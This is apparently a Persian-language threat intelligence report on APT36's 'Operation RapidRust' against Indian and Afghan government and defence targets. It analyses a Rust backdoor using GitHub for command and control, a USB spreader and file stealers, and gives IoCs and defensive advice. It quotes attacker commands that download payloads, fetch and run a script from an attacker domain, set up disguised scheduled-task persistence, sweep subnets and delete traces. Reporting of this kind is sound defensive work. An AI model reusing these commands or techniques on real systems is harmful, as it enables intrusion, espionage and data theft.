در اوت 2026، مجموعهای از فعالیتهای تازه و منسجم از سوی گروه تهدید منسوب به پاکستان با نام APT36 علیه سازمانهای دولتی و حوزه دفاعی در هند و افغانستان مشاهده شد. در این کارزار که تحت عنوان Operation RapidRust رصد شد، مهاجمان تاکتیکها، تکنیکها و رویههای خود را بهروزرسانی کردند و از مجموعهای از ابزارهای جدید شامل دربپشتی RUSTYSHADE، ابزار گسترش از طریق رسانههای قابلحمل RUSTYMOVE، و ابزارهای سرقت فایل PSNATCH و BASHNATCH بهره گرفتند. RUSTYSHADE با سوءاستفاده از مخازن خصوصی GitHub برای فرماندهی و کنترل و رمزنگاری ترافیک C2 با AES-256-GCM، و RUSTYMOVE با کپی فایلهای مخرب ازپیشجانماییشده روی دیسکهای USB بهمنظور عبور از شبکههای ایزوله (air-gapped)، هسته قابلیتهای این عملیات را تشکیل دادند.
در جریان این عملیات، مهاجمان علاوه بر استقرار بدافزارهای جدید، فعالیتهای گستردهای پس از نفوذ انجام دادند که شامل شناسایی سیستم، شبکه و کاربر، پایدارسازی از طریق Scheduled Task، تلاش برای حرکت جانبی با نقشهبرداری از ماشینهای فعال و اشتراکهای شبکه، و پاکسازی ردپا بود. همچنین تعدادی دامنه مشابهسازیشده (typosquatted) برای جاگذاری اسکریپتهای PowerShell و بارهای بعدی ایجاد شد که رسانههای خبری محبوب هندی را جعل میکرد.
نکات کلیدی عملیات RapidRust
- در اوت 2026، فعالیتهای تازه APT36 علیه نهادهای دولتی و دفاعی در هند و افغانستان مشاهده شد. تمرکز این فعالیتها بر نفوذ، جمعآوری اطلاعات و تداوم حضور بود.
- بدافزار RUSTYSHADE یک دربپشتی 64-بیتی مبتنی بر Rust است که از مخازن خصوصی GitHub بهعنوان کانال C2 استفاده میکند و پیامها را با AES-256-GCM رمز میکند.
- ابزار RUSTYMOVE یک مؤلفه پس از نفوذ است که فایلهای مخرب ازپیشجانماییشده را به رسانههای قابلحمل متصلشده به ماشین آلوده کپی میکند و زمینه انتشار بدافزار به شبکههای air-gapped را فراهم میسازد.
- چند دامنه مشابهسازیشده برای درج اسکریپتهای PowerShell و بارهای مرحله بعد، با جعل رسانههای خبری هندی، ثبت شد.
- ابزار PSNATCH (PowerShell) برای سرقت فایل در ویندوز و BASHNATCH (bash) برای لینوکس بهکار رفتند؛ هر دو، فایلهای با پسوند مشخص و داخل مسیرهای ازپیشتعریفشده را پیمایش و به مخازن خصوصی GitHub مهاجم ارسال میکنند.
- حرکت جانبی شامل شناسایی میزبانهای زنده، نگاشت اشتراکهای شبکه و تلاش برای اتصال به IPC$ با نشست تهی و نیز با اعتبارنامه مشخص انجام گرفت.
تحلیل فنی کارزار و ابزارهای جدید
تحلیل بدافزار RUSTYSHADE
بدافزار RUSTYSHADE یک دربپشتی 64-بیتی برای ویندوز و نوشتهشده با Rust است که مانند برخی کمپینهای پیشین (که از سازوکار مشابه GITSHELLPAD استفاده میکردند) مخازن خصوصی GitHub را بهعنوان کانال C2 بهکار میگیرد. تفاوتهای مهم شامل رمزنگاری ارتباطات C2 با AES-256-GCM، پشتیبانی از مجموعهای از فرمانهای جدید و انتخاب Rust بهجای Golang است. این بدافزار در مرحله پس از نفوذ با فرمان PowerShell روی سیستمهای قربانی جایگذاری شد.
powershell wget https://f005.backblazeb2[.]com/file/Clients-easy/DriverInstaller.zip -o ww.zip
کانال فرماندهی و کنترل RUSTYSHADE بر مبنای GitHub REST API پیادهسازی شده است. یک GitHub personal access token (PAT) بهصورت متن ساده در باینری هاردکد شده و بدافزار با استفاده از آن در برابر API احراز هویت کرده و با مخزن خصوصی کنترلشده از سوی مهاجم تعامل میکند. قالب فراخوانی API، هدرهای مورد نیاز و شیوه قالببندی درخواستها مطابق الگوی زیر است.
- Endpoint Template: https://api.github.com/repos/[owner]/[repo]/contents/[path]?ref=[branch]&t=[timestamp]
- Authentication: Authorization: token [PAT]
- Accept: application/vnd.github.v3+json
تمام پیامهای تبادلی بین RUSTYSHADE و مخزن C2 روی GitHub با AES-256-GCM رمز میشوند. روند رمزگذاری پیامها بهاینترتیب انجام میشد: کلید 32-بایتی AES از SHA256 مربوط به PAT مشتق میشد؛ سپس یک nonce تصادفی 12-بایتی با BCryptGenRandom ایجاد و متن با AES-256-GCM رمز میشد تا متن رمزشده و یک برچسب تأیید اصالت 16-بایتی (authentication tag) تولید کند. داده نهایی با قرار دادن nonce بهعنوان پیشوند و برچسب 16-بایتی در انتها، بهشکل nonce[12] || ciphertext || tag[16] قالببندی و سپس Base64-encode میشد. رشته «HCENC1:» به ابتدای محتوای Base64 افزوده میشد تا پیام نهایی با ساختار زیر شکل بگیرد.
HCENC1:[base64(nonce || ciphertext || tag)]
برای رمزگشایی، بدافزار پیشوند HCENC1 را حذف و داده Base64 را دیکد کرده و با AES-256-GCM رمزگشایی میکرد. همسوسازی (synchronization) بین ماشین آلوده و C2 با نامگذاری فایلهای مشخص در مخزن خصوصی GitHub انجام میشد. این فایلها نقش بافر فرمان، خروجی، ضربان حیات و اشیای استخراجی را ایفا میکردند.
| Filename | Purpose |
|---|---|
| command.txt | فرمانهای C2 بهصورت رمزشده. |
| results.txt | خروجی فرمانها بهصورت رمزشده. |
| info.txt | دادههای شناسایی سیستم. |
| heartbeat.txt |
Keep-Alive Beacon با زمان Epoch. |
| screenshot.png | اسکرینشات دسکتاپ بهصورت رمزشده. |
| webcam_photo.jpg | تصویر وبکم بهصورت رمزشده. |
| download.bin | محتوای فایل استخراجشده بهصورت رمزشده. |
الگوی تبادل فرمانها بدینصورت بود: مهاجم فرمان را با الگوریتم فوق رمز کرده و در فایل command.txt کامیت میکرد. بدافزار روی دستگاه آلوده با polling به REST API تغییرات را دریافت و فرمان را بازیابی، رمزگشایی و اجرا کرده و سپس خروجی را دوباره رمز و در فایل results.txt آپلود میکرد. قالب فرمانها بهشکل [COMMAND][:{arg}] بوده و نام فرمان با دو نقطه یا فاصله از آرگومان جدا میشد. فهرست فرمانهای پشتیبانیشده در جدول زیر آمده است.
| Command | Description |
|---|---|
| ss_up | گرفتن اسکرینشات با GDI32، ذخیره به PNG و آپلود بهنام screenshot.png. |
| CAP-photo | گرفتن عکس وبکم با WIA.CommonDialog و آپلود بهنام webcam_photo.jpg. |
| cd .. | تغییر مسیر به شاخه والد. |
| cd | تغییر مسیر کاری به [path]. |
| run | اجرای فرمان در پسزمینه با CreateProcessW بهصورت detached. |
| HC_LIST | فهرستکردن محتوای مسیر کاری جاری. |
| HC_DRIVES | شمارش حروف درایوهای سیستم. |
| HC_CD | تغییر مسیر کاری با قالب فرمان جایگزین. |
| HC_CD:this pc | نام مستعار برای HC_DRIVES (غیرحساس به بزرگیکوچکی). |
| HC_DOWNLOAD | خواندن فایل در [path]، فشردهسازی با Compress-Archive، رمزگذاری و آپلود بهنام download.bin. |
| (default) | اجرای ورودی بهعنوان فرمان پوسته با %SystemRoot%\System32\cmd.exe. |
این طراحی مبتنی بر GitHub مزیت پوششپذیری بالا در برابر تحلیلهای شبکهای را برای مهاجم فراهم میکند، زیرا ترافیک به دامنههای مشروع و پرترافیک ختم میشود و استفاده از PAT خصوصی و رمزنگاری انتهابهانتها، تحلیل payload را دشوار میکند. از سوی دیگر، وابستگی به فایلنامهای مشخص و روند commit/contents در REST API به مدافعان امکان میدهد الگوهای خاص فعالیت را در لاگها جستوجو کنند.
ابزار PowerShell برای سرقت فایل PSNATCH
در مرحله پس از نفوذ، بازیابی یک اسکریپت PowerShell از GitHub gist مهاجم مشاهده شد که PSNATCH نامگذاری شده است. کارکرد اصلی PSNATCH سرقت فایل از ماشین آلوده و ارسال آن به مخازن خصوصی GitHub مهاجم بود. این اسکریپت مسیرهای ازپیشتعریفشده شامل Desktop، Downloads، Documents، OneDrive (نسخه شخصی و تجاری) و درایوهای D: تا H: را بهصورت بازگشتی پیمایش میکرد و بر اساس فهرست گستردهای از پسوندها (شامل اسناد Microsoft Office، تصاویر، آرشیوها، رسانه، فایلهای اجرایی، اسکریپتها و پایگاههای داده) فایلها را انتخاب مینمود. زمان آخرین تغییر فایل باید در 120 روز گذشته بود. برای کنترل حجم، سقف 1 GB برای هر فایل و 5 GB برای هر اجرای اسکریپت اعمال شده بود.
فرآیند خروجیگیری بهصورت ارسال مستقیم به مخازن خصوصی مهاجم انجام میشد؛ بنابراین، با وجود تکیه بر زیرساخت مشروع، مسیر خروج اطلاعات نسبتاً یکنواخت و قابل ردیابی باقی میماند. این الگو در محیطهایی که ترافیک به api.github.com مجاز است، ریسک بالایی ایجاد میکند.
ابزار bash برای لینوکس BASHNATCH
BASHNATCH نسخه لینوکسی PSNATCH است و با بهرهگیری از bash در محیطهای لینوکسی همان رویکرد را پیاده میکند. مسیرها و پسوندهای هدف مشابه نسخه ویندوزی است و برای پیشگیری از ارسال تکراری، فهرست فایلهای ارسالشده را در مسیر زیر نگهداری میکرد.
~/.local/share/SmartUploader/uploaded_files.json
این مکانیزم ساده اما کارا، هم تداوم جمعآوری را تضمین و هم حجم بیرویه ترافیک را کاهش میدهد و در نتیجه، کشف مبتنی بر ناهنجاری حجم در برخی سناریوها را دشوارتر میکند.
ابزار گسترش از طریق USB با Rust بهنام RUSTYMOVE
ابزار RUSTYMOVE یک باینری 64-بیتی سبک مبتنی بر Rust است که صرفاً برای مانیتورینگ مداوم رسانههای قابلحمل خارجی و کپی دو فایل مخرب ازپیشجانماییشده به ریشه هر درایو شناساییشده طراحی شده است. هدف از این طراحی، تسهیل انتقال آلودگی از یک میزبان آلوده به سامانههای air-gapped از طریق حمل فیزیکی رسانه توسط کاربر است. این ابزار هیچ payload نهفتهای در خود ندارد، رمزنگاری نمیکند و با زیرساخت C2 ارتباطی برقرار نمیکند؛ بنابراین فقط یک مؤلفه حرکت جانبی و تکثیر از طریق USB محسوب میشود. وابستگی به مسیرهای ثابت برای دو فایل ازپیشجانماییشده نشان میدهد RUSTYMOVE احتمالاً در مراحل اولیه توسعه قرار داشت.
دو فایلی که RUSTYMOVE در صورت اتصال درایو خارجی کپی میکرد عبارت بودند از:
- C:\Users\Public\Documents\DriverInstaller.zip که شامل اجرایی RUSTYSHADE بود.
- C:\Users\Public\Documents\DocScanner-11-Aug-2026-5-37pm.pdf.LNK که ارزیابی با اطمینان بالا نشان میداد هدف آن اجرای RUSTYSHADE استخراجشده از DriverInstaller.zip پس از بازگشایی است.
در جریان فعالیت پس از نفوذ، مشاهده شد که RUSTYMOVE با دستورهای زیر روی یک ماشین قربانی قرار داده و پایدارسازی شده است.
cd C:\Users\Public\AccountPictures
dir
powershell wget hxxps://clients-easy.s3.us-east-005.backblazeb2[.]com/Automata-20.zip -o d.zip
dir
tar -xvf d.zip
dir
Start-Process -FilePath ".\Automata-20.exe"
powershell.exe -NoProfile -Command "$t='StandAloneOneDriveUpdater-2626';$a=New-ScheduledTaskAction -Execute 'C:\Users\Public\AccountPictures\Automata-20.exe';$tr=New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME;Register-ScheduledTask -TaskName $t -Action $a -Trigger $tr -User $env:USERNAME -Force"
schtasks /Query /TN "StandAloneOneDriveUpdater-2626" /V /FO LIST
وظیفه زمانبندیشده ایجادشده RUSTYMOVE را هنگام ورود کاربر اجرا میکرد. نام آن، StandAloneOneDriveUpdater-2626، برای تقلید یک سرویس بهظاهر مشروع انتخاب شده بود. فرایند اجرای RUSTYMOVE در یک حلقه بینهایت با مکث 2 ثانیهای بین تکرارها حرکت میکرد و دو وظیفه اصلی داشت: کشف درایو خارجی و انتشار فایل.
کشف درایو خارجی با اجرای اسکریپت PowerShell زیر از طریق CreateProcessW انجام میشد تا رسانههای USB، 1394، SD، MMC و دیسکهایی با MediaType قابلحمل را استخراج کند.
powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command " Get-Volume | Where-Object DriveLetter | ForEach-Object { $letter = $_.DriveLetter $part = Get-Partition -DriveLetter $letter -ErrorAction SilentlyContinue if (-not $part) { return } $disk = Get-Disk -Number $part.DiskNumber -ErrorAction SilentlyContinue if (-not $disk) { return } $external = ($disk.BusType -in @('USB','1394','SD','MMC')) -or ($disk.MediaType -in @('Removable Media','External hard disk media')) if ($external -and $_.UniqueId) { Write-Output ('{0}|{1}' -f $letter, $_.UniqueId) } } "
خروجی اسکریپت برای رشتههای حاوی \\?\Volume پارس میشد و برای هر درایو معتبر، یک فراخوانی دیگر برای بازیابی UniqueId حجم اجرا میگردید.
Get-Volume -DriveLetter [X] -ErrorAction SilentlyContinue | Select-Object -ExpandProperty UniqueId
در مرحله انتشار فایل، بدافزار یک HashMap با کلید UniqueId حجم نگه میداشت تا از آلودگی تکراری یک درایو جلوگیری کند. سپس برای هر یک از دو فایل ازپیشجانماییشده، نام فایل را استخراج، مسیر مقصد را بهشکل [DriveLetter]:\[filename] ساخته و اگر فایل در مقصد وجود نداشت، با CopyFileExW کپی میکرد. در صورت موفقیت کپی، پیام «Copied: [path]» در log.txt ثبت و اگر کپی جدیدی انجام نمیشد، پیام «No new files copied (already on drive, missing source, or copy failed).» نوشته میشد. در پایان هر چرخه نیز نتیجه بهصورت «Success [N] user(s).» در صورت وجود کپی جدید گزارش میگردید.
فعالیتهای پس از نفوذ و زمانبندی اجرای فرمانها
تحلیل زمانسنجی فرمانهای C2 نشان داد فرمانها عمدتاً در بازه 4:00 تا 11:00 بهوقت UTC صادر شدند و کل فعالیتهای مشاهدهشده بین 20 اوت 2026 تا 1 سپتامبر 2026 رخ داد. توزیع روزانه فعالیتها نشان داد عملیات در روزهای کاری فعال بود و در دو آخر هفته داخل بازه مورد بررسی، فعالیتی دیده نشد. این الگو با چرخههای کاری متعارف سازگار است و میتواند نشاندهنده عملیات انسانی همزمان باشد.
خلاصه فرمانهای صادره از سوی عامل تهدید از طریق RUSTYSHADE با دستهبندی عملکردی در جدول زیر آمده است. این فرمانها جنبههای مختلفی از شناسایی سیستم، شبکه، پایداری، اعتبارسنجی شبکه، حرکت جانبی و پاکسازی ردپا را پوشش میدهند.
| Category | C2 commands | Description |
|---|---|---|
| System Reconnaissance | ipconfig, ipconfig /all whoami, whoami /groups, whoami /priv echo %COMSPEC%, echo %USERPROFILE% hostname, tasklist |
شناسایی کاربر فعلی، گروهها و امتیازات، فهرست پردازهها، نام میزبان، پیکربندی آداپتور شبکه و مسیر مفسر فرمان. |
| Network Reconnaissance | arp -a ping -a [IP] nbtstat -A [IP] net view, net view \\[IP] net share, net session for /L %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | findstr /i \”reply bytes TTL\” 1..254 | ForEach-Object { if (Test-Connection \”192.168.1.$_\” -Count 1 -Quiet -TimeoutSeconds 1) { Write-Host \”UP: 192.168.1.$_\” } } |
نقشهبرداری از شبکه محلی با پویش زیربخش برای میزبانهای زنده، حل نام معکوس و NetBIOS و شمارش ماشینهای قابلمشاهده و اشتراکهای SMB. |
| Geolocation | Invoke-RestMethod http://ip-api.com/json | Select-Object lat, lon curl https://ipinfo.io/json curl https://ipapi.co/json |
بازیابی IP عمومی و مختصات جغرافیایی دستگاه آلوده با APIهای عمومی مکانیابی. |
| Persistence | Register-ScheduledTask -TaskName ‘StandAloneOneDriveUpdater-2626’ … -Execute ‘Automata-20.exe’ -Trigger -AtLogOn schtasks /Create /TN \”StandAloneOneDriveUpdater-2626\” /SC ONLOGON Register-ScheduledTask -TaskName ‘MicrosoftEdgeUpdateTaskUserS-1-5-24-…’ … conhost.exe –headless powershell.exe -EncodedCommand [irm indiatodays[.]org/pv | iex] |
ایجاد وظایف زمانبندی برای اجرای payload در هنگام ورود کاربر با نامهای جعلی مشابه سرویسهای مشروع OneDrive و Edge. |
| Persistence Verification | schtasks /Query /TN \”StandAloneOneDriveUpdater-2626\” /V /FO LIST schtasks /Query /FO LIST /V schtasks /Query /FO TABLE |
اعتبارسنجی ثبت موفق وظایف زمانبندیشده با پرسوجوی آنها و بررسی کد خروج. |
| Network Verification | ping -n 1 [IP], ping -n 1 -w 1000 [IP] for %i in ([list]) do @ping … | findstr \”reply TTL\” powershell -Command \”Test-NetConnection [IP] -Port 445\” powershell -Command \”Test-NetConnection [IP] -Port 135\” |
بازسنجی میزبانهای قبلاً کشفشده و آزمون پورتهای SMB 445 و RPC 135 برای انتخاب اهداف مناسب حرکت جانبی. |
| Lateral Movement | net use \\[IP]\\IPC$ net use \\[IP]\\IPC$ /user:[machine_name]\\admin * |
تلاش برای اتصال به اشتراک IPC$ ابتدا با نشست تهی و سپس با اعتبارنامه مدیر مشخص. |
| Anti-Forensics | del yogi.zip, del DriverInstaller.exe, del HealthCheck.exe, del sheets_agent.dll, del t_tracker.json, del a.zip, del hh.zip, del ms.zip ren om.zip DriverInstaller.zip |
حذف فایلهای مربوط به ابزارهای پیشتر مستقرشده و تغییر نام برای هموارسازی نشانهها. |
زیرساخت و دامنههای مشابهسازیشده
در پشتیبانی زیرساختی از عملیات، علاوه بر تکیه بر سرویسهای مشروع اینترنتی مانند مخازن خصوصی GitHub برای C2 و سکوی ذخیرهسازی ابری Backblaze برای میزبانی ابزارهای پس از نفوذ، تعدادی دامنه از طریق NameCheap ثبت شدند که اسکریپتهای PowerShell میانی و بارهای مرحله بعد روی آنها جاگذاری میشد. این دامنهها رسانههای خبری شناختهشده هندی را جعل میکردند.
| Malicious domain | Legitimate domain | Registration date |
|---|---|---|
| theprints[.]org | theprint.in | May 11, 2026 |
| indiatodays[.]org | indiatoday.in | Aug 17, 2026 |
این دامنهها برای میزبانی اسکریپتهای بارگذار PowerShell و انتقال به payloadهای اصلی استفاده شدند. استفاده از نامهای نزدیک به برندهای خبری معتبر و مسیرهای متنی شبیه سرویسهای رایج، احتمال کلیک و اجرا توسط کاربر هدف یا عبور از برخی فیلترهای ساده را افزایش میدهد.
جمعبندی عملیات و ارزیابی تاکتیکی
عملیات RapidRust نشان داد APT36 ضمن حفظ سرعت بالای عملیات علیه اهداف دولت و دفاع در هند و افغانستان، توانسته است سبد ابزار خود را با مؤلفههای مبتنی بر Rust گسترش دهد و بهطور همزمان مسیرهای خروج داده و کانالهای C2 خود را با تکیه بر سرویسهای معتبر پنهان کند. RUSTYSHADE با رمزنگاری انتهابهانتها و مدیریت فرمان از طریق فایلهای مخزن خصوصی، شالوده کانال کنترل را تشکیل داده است؛ PSNATCH و BASHNATCH با پوشش ویندوز و لینوکس، دامنه جمعآوری را وسیع میکنند؛ و RUSTYMOVE مسیر انتشار فیزیکی به شبکههای جداافتاده را مهیا میسازد.
الگوی زمانی صدور فرمانها و متمرکز بودن فعالیتها در روزهای کاری، با مدل عملیات مبتنی بر اپراتور انسانی و بازههای کاری معمول سازگار است. بهکارگیری Scheduled Task با نامهای معنادار و شبهمشروع از جمله StandAloneOneDriveUpdater-2626 و عناوینی با برچسب Microsoft Edge Updater، نشان میدهد مهاجم بهدنبال پایداری کمسر و صدا و ادغام با عادات مدیریتی میزبان بوده است. تلاش هدفمند برای نقشهبرداری شبکه و آزمون پورتهای SMB و RPC نیز گواه قصد آشکار برای حرکت جانبی و نفوذ افقی است.
پوشش شناسایی و نامگذاری تهدید
در طبقهبندی شناسایی مبتنی بر نام خانواده/ماژول، موارد زیر برای مؤلفههای این کارزار گزارش شده است:
- Win64.Backdoor.RUSTYSHADE.
- Win64.Spreader.RUSTYMOVE.
- PS.Malicious.PSNATCH.
- Linux.Malicious.BASHNATCH.
Indicators Of Compromise
File indicators
| Hashes | Filename | Description |
|---|---|---|
| 40a75f87f1e52c33df9ca733aaf8ebbb 00aff1a72c5d5635ab36ce2eb370718a7f0557a0 52d07b3ef0c5f27d082551d51027de452682e1fbd5bb38a897ea4b31bd387523 |
DriverInstaller.zip | ZIP archive containing RUSTYSHADE |
| Ae77f1834ccde53258bc27a779102af2 761ccb15af1c3fe6e4365ddf65578966e4c84fc9 80fdde0dafa450ae33937ccef752b46666da567926b2f39b37e02e77f9d6a92e |
DriverInstaller.exe | RUSTYSHADE |
| Aade06ec611d69f1553035f22356ccf4 Ad4afe86a835bb2f7768862d358ebd8324c05902 05bbeea42f481a3dd1b3f670aba481f7c5c8e897ef321d65188317be5a65a4d7 |
Automata-20.zip | ZIP archive containing RUSTYMOVE |
| F16f507a8ed515663a4f07050cd97a74 00e1cc0fb1355c196c069791a02b4a5f3b57ae94 70fc6cba3c2021889fb4093d0221dc6925818666df25718a630c562cac18da31 |
Automata-20.exe | RUSTYMOVE |
Network indicators
| Type | Indicator |
|---|---|
| Payload staging domain | theprints[.]org |
| Payload staging domain | officialinfo[.]org |
| Payload staging domain | indiatodays[.]org |
| Payload staging URL | theprints.]org/adrive |
| Payload staging URL | theprints[.]org/drivefolder |
| Payload staging URL | theprints[.]org/mau |
| Payload staging URL | theprints[.]org/msheets |
| Payload staging URL | theprints[.]org/gsheets |
| Payload staging URL | hxxps://clients-easy.s3.us-east-005.backblazeb2[.]com/Automata-20.zip |
| Payload staging URL | hxxps://f005.backblazeb2[.]com/file/Clients-easy/DriverInstaller.zip |
نتیجهگیری
شواهد گردآوریشده در عملیات RapidRust نشان داد APT36 با تمرکز بر اهداف دولت و دفاع در هند و افغانستان، تاکتیکهای خود را با ابزارهای مبتنی بر Rust، سرقت فایل چندسکویی و گسترش مبتنی بر USB بهروزرسانی کرده است. اتکا به مخازن خصوصی GitHub برای فرماندهی و کنترل و انتقال دادهها، همزمان با رمزنگاری پیامها و استفاده از دامنههای مشابهسازیشده، ترکیبی از اختفا و فریب را برای عبور از کنترلهای امنیتی فراهم کرده است. همافزایی RUSTYSHADE، PSNATCH/BASHNATCH و RUSTYMOVE نشان میدهد مهاجم در پی زنجیره عملیاتی کامل از نفوذ تا جمعآوری و انتشار فراتر از مرزهای شبکههای متداول بوده است.
برای تیمهای امنیتی سازمانی، پایش درخواستها به api.github.com با الگوهای رفتاری ناهنجار، ممیزی Scheduled Taskهای کاربرمحور با نامهای شبهمشروع، سدگذاری در برابر اجرای اسکریپتهای PowerShell دریافتی از دامنههای غیرمعتبر، و سیاستگذاری رسانههای قابلحمل میتواند در کشف و مهار چنین کارزارهایی تعیینکننده باشد. همچنین انطباق مداوم IoCها با کنترلهای دفاعی و مسدودسازی دامنهها و مسیرهای شناختهشده در این گزارش ضروری است.









